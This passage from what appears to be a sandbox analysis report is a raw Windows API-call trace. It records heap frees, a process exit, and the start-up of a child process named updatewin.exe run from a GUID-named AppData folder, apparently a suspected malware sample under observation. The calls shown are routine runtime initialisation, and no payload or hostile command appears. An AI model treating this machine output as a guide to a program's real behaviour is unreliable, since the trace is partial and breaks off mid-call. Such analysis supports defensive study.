HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc3e8 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc410 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc438 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501618 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501640 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501668 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501690 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5016b8 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5016e0 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501708 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501730 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501758 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501780 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5017a8 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5017d0 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5017f8 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501820 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501848 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501870 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501898 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5018c0 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5018e8 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501910 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501938 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501960 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501988 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5019b0 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5019d8 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501a00 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501a28 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501a50 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501a78 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501aa0 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501ac8 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501af0 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501b18 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501b40 | out: hHeap=0x4d0000) returned 1 [0044.696] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501b68 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501b90 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501bb8 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501be0 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501c08 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501c30 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501c58 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501c80 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501ca8 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501cd0 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501cf8 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501d20 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501d48 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501d70 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501d98 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501dc0 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501e18 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501e40 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501e68 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501e90 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501eb8 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501ee0 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501f08 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501f30 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501f58 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501f80 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501fa8 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501fd0 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x501ff8 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502020 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502048 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502070 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502098 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5020c0 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5020e8 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e5490 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502110 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502138 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502160 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502188 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5021b0 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5021d8 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502200 | out: hHeap=0x4d0000) returned 1 [0044.697] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502228 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502250 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502278 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5022a0 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5022c8 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5022f0 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502318 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502340 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502368 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502390 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5023b8 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5023e0 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502408 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502430 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502458 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502480 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5024a8 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5024d0 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5024f8 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502520 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502548 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502570 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502598 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5025c0 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502618 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502640 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502668 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502690 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5026b8 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5026e0 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502708 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502730 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502758 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502780 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5027a8 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5027d0 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5027f8 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502820 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502848 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502870 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502898 | out: hHeap=0x4d0000) returned 1 [0044.698] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5028c0 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5028e8 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502910 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502938 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502960 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502988 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5029b0 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5029d8 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502a00 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502a28 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502a50 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502a78 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x502aa0 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x504e00 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4feaf8 | out: hHeap=0x4d0000) returned 1 [0044.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0044.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fa3e8 | out: hHeap=0x4d0000) returned 1 [0044.699] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fcdc8 | out: hHeap=0x4d0000) returned 1 [0044.699] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.699] GetLastError () returned 0x57 [0044.699] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f584 | out: phModule=0x18f584) returned 0 [0044.699] ExitProcess (uExitCode=0x0) [0044.700] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fad00 | out: hHeap=0x4d0000) returned 1 [0044.700] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "8" image_name = "updatewin.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe" page_root = "0x4d687000" os_pid = "0xa00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x938" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 52 os_tid = 0xa04 [0044.498] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x18e23e90, dwHighDateTime=0x1d5956a)) [0044.498] GetCurrentProcessId () returned 0xa00 [0044.498] GetCurrentThreadId () returned 0xa04 [0044.498] GetTickCount () returned 0x1144b24 [0044.498] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=16467327130) returned 1 [0044.510] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0044.510] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x230000 [0044.511] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.511] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0044.511] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0044.511] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0044.511] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0044.512] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.512] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0044.512] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.512] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0044.512] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.512] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0044.512] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.512] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0044.512] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.512] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0044.512] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.513] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0044.513] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.513] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0044.513] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.513] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0044.513] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x214) returned 0x2307d0 [0044.513] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.513] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0044.514] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0044.514] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0044.514] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0044.514] GetCurrentThreadId () returned 0xa04 [0044.514] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0044.514] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x2309f0 [0044.514] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0044.514] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0044.514] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0044.514] SetHandleCount (uNumber=0x20) returned 0x20 [0044.514] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe\" " [0044.515] GetEnvironmentStringsW () returned 0x4f4e60* [0044.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0044.515] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x565) returned 0x2311f8 [0044.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2311f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0044.515] FreeEnvironmentStringsW (penv=0x4f4e60) returned 1 [0044.515] GetLastError () returned 0x0 [0044.515] SetLastError (dwErrCode=0x0) [0044.515] GetLastError () returned 0x0 [0044.515] SetLastError (dwErrCode=0x0) [0044.515] GetLastError () returned 0x0 [0044.515] SetLastError (dwErrCode=0x0) [0044.515] GetACP () returned 0x4e4 [0044.515] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x220) returned 0x231768 [0044.515] GetLastError () returned 0x0 [0044.515] SetLastError (dwErrCode=0x0) [0044.515] IsValidCodePage (CodePage=0x4e4) returned 1 [0044.515] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0044.515] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0044.515] GetLastError () returned 0x0 [0044.515] SetLastError (dwErrCode=0x0) [0044.515] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0044.515] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.515] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0044.515] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0044.515] GetLastError () returned 0x0 [0044.516] SetLastError (dwErrCode=0x0) [0044.516] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0044.516] MultiByteToWideChar (in: 